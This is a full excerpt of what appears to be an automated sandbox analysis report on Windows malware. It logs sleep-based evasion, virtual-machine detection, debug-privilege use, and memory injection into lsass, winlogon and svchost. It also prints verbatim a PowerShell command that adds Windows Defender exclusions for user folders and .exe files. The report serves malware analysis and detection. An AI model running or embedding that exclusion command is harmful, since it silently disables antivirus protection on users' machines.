Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -595296s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -595187s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -595077s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -594968s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -594859s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -594750s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -594638s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -594530s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -594421s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -594311s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -594203s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -594093s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -593984s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -593875s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -593765s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -593656s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -593465s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -593324s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -593216s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -593099s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -592979s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -592867s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -592762s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7788	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\dialer.exe TID: 7936	Thread sleep count: 8408 > 30
Source: C:\Windows\System32\dialer.exe TID: 7936	Thread sleep time: -840800s >= -30000s
Source: C:\Windows\System32\dialer.exe TID: 8036	Thread sleep count: 1449 > 30
Source: C:\Windows\System32\dialer.exe TID: 8036	Thread sleep time: -144900s >= -30000s
Source: C:\Windows\System32\winlogon.exe TID: 7656	Thread sleep count: 2545 > 30
Source: C:\Windows\System32\winlogon.exe TID: 7656	Thread sleep time: -2545000s >= -30000s
Source: C:\Windows\System32\winlogon.exe TID: 7656	Thread sleep count: 7455 > 30
Source: C:\Windows\System32\winlogon.exe TID: 7656	Thread sleep time: -7455000s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\PerfDll\hyperProviderSavesinto.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Code function: 0_2_00007FF7F4D7ECA0 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Code function: 0_2_00007FF7F4D6647C FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Code function: 0_2_00007FF7F4D930F0 FindFirstFileExA
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Code function: 1_2_00D5A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Code function: 1_2_00D6C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW
Source: C:\Windows\System32\conhost.exe	Code function: 7_2_000001B0BB98DCE0 FindFirstFileExW
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Code function: 9_2_00000216D26FDCE0 FindFirstFileExW
Source: C:\Windows\System32\cmd.exe	Code function: 38_2_00000150E93EDCE0 FindFirstFileExW
Source: C:\Windows\System32\conhost.exe	Code function: 40_2_00000267FCE9DCE0 FindFirstFileExW
Source: C:\Windows\System32\PING.EXE	Code function: 45_2_000002359B52DCE0 FindFirstFileExW
Source: C:\Windows\System32\winlogon.exe	Code function: 49_2_00000225DC64DCE0 FindFirstFileExW
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Code function: 0_2_00007FF7F4D850F4 VirtualQuery,GetSystemInfo
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\PerfDll\hyperProviderSavesinto.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 600000
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 599812
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 599425
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 599292
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 599094
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 598729
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 598234
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 598125
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 598012
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 597672
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 597546
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 597437
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 597273
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 597171
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 597056
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 596804
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 596662
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 596542
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 596434
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 596327
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 596218
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 596108
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 596000
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 595890
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 595781
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 595628
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 595515
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 595406
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 595296
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 595187
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 595077
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 594968
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 594859
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 594750
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 594638
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 594530
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 594421
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 594311
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 594203
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 594093
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 593984
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 593875
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 593765
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 593656
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 593465
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 593324
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 593216
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 593099
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 592979
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 592867
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 592762
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 922337203685477
                                Source: C:\PerfDll\hyperProviderSavesinto.exe | File opened: C:\Users\user
                                Source: C:\PerfDll\hyperProviderSavesinto.exe | File opened: C:\Users\user\Documents\desktop.ini
                                Source: C:\PerfDll\hyperProviderSavesinto.exe | File opened: C:\Users\user\AppData
                                Source: C:\PerfDll\hyperProviderSavesinto.exe | File opened: C:\Users\user\AppData\Local\Temp
                                Source: C:\PerfDll\hyperProviderSavesinto.exe | File opened: C:\Users\user\Desktop\desktop.ini
                                Source: C:\PerfDll\hyperProviderSavesinto.exe | File opened: C:\Users\user\AppData\Local
                                Source: GargantuaN.exe, 00000001.00000003.1641039969.0000000003502000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
                                Source: wscript.exe, 00000003.00000003.1698379391.000000000332C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}f
                                Source: hyperProviderSavesinto.exe, 00000008.00000002.1751357469.000000001BB39000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}K
                                Source: KZcLqgnLvRf.exe, 00000014.00000002.2908332950.000000001B8A0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllll:
                                Source: wscript.exe, 00000003.00000003.1698379391.000000000332C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\C
                                Source: PING.EXE, 0000002D.00000002.1838656558.000002359AF59000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllhh
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe | API call chain: ExitProcess graph end node
                                Source: C:\Windows\System32\dialer.exe | API call chain: ExitProcess graph end node
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe | Code function: 0_2_00007FF7F4D86900 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00007FF7F4D86900
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe | Code function: 1_2_00D77DEE mov eax, dword ptr fs:[00000030h] 1_2_00D77DEE
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe | Code function: 0_2_00007FF7F4D94170 GetProcessHeap, 0_2_00007FF7F4D94170
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                                Source: C:\PerfDll\hyperProviderSavesinto.exe | Process token adjusted: Debug
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe | Process token adjusted: Debug
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe | Process token adjusted: Debug
                                Source: C:\Windows\System32\dialer.exe | Process token adjusted: Debug
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe | Code function: 0_2_00007FF7F4D86900 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00007FF7F4D86900
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe | Code function: 0_2_00007FF7F4D86AE4 SetUnhandledExceptionFilter, 0_2_00007FF7F4D86AE4
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe | Code function: 0_2_00007FF7F4D85CA0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00007FF7F4D85CA0
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe | Code function: 0_2_00007FF7F4D8AC28 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00007FF7F4D8AC28
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe | Code function: 1_2_00D6F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_00D6F838
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe | Code function: 1_2_00D6F9D5 SetUnhandledExceptionFilter, 1_2_00D6F9D5
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe | Code function: 1_2_00D6FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 1_2_00D6FBCA
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe | Code function: 1_2_00D78EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_00D78EBD
                                Source: C:\Windows\System32\conhost.exe | Code function: 7_2_000001B0BB98D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_000001B0BB98D2A4
                                Source: C:\Windows\System32\conhost.exe | Code function: 7_2_000001B0BB987D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_000001B0BB987D90
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Code function: 9_2_00000216D26F7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 9_2_00000216D26F7D90
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Code function: 9_2_00000216D26FD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 9_2_00000216D26FD2A4
                                Source: C:\Windows\System32\cmd.exe | Code function: 38_2_00000150E93ED2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 38_2_00000150E93ED2A4
                                Source: C:\Windows\System32\cmd.exe | Code function: 38_2_00000150E93E7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 38_2_00000150E93E7D90
                                Source: C:\Windows\System32\conhost.exe | Code function: 40_2_00000267FCE97D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 40_2_00000267FCE97D90
                                Source: C:\Windows\System32\conhost.exe | Code function: 40_2_00000267FCE9D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 40_2_00000267FCE9D2A4
                                Source: C:\Windows\System32\PING.EXE | Code function: 45_2_000002359B52D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 45_2_000002359B52D2A4
                                Source: C:\Windows\System32\PING.EXE | Code function: 45_2_000002359B527D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 45_2_000002359B527D90
                                Source: C:\Windows\System32\winlogon.exe | Code function: 49_2_00000225DC647D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 49_2_00000225DC647D90
                                Source: C:\Windows\System32\winlogon.exe | Code function: 49_2_00000225DC64D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 49_2_00000225DC64D2A4
                                Source: C:\PerfDll\hyperProviderSavesinto.exe | Memory allocated: page read and write | page guard

                                HIPS / PFW / Operating System Protection Evasion

                                Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: 225DC610000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\lsass.exe base: 202C0AB0000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 2A6612D0000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\dwm.exe base: 2BAAF190000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 26A87990000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 17953770000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 2295D530000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 253067D0000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1845B380000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1ADEBFD0000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1D559040000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 241A9E70000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1CD73160000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Recovery\RuntimeBroker.exe base: 1300000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 2824E860000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 21B473C0000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 2086F9D0000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 17183BC0000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 23FD3F70000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1D2A4150000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 275BDF30000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1AAC0260000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 203C9F30000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1B5644B0000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1BB7B2A0000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1C004F60000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 24E2AB40000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 2644ADB0000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\spoolsv.exe base: 1990000 protect: page execute and read and write
                                Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 20D25DA0000 protect: page execute and read and write
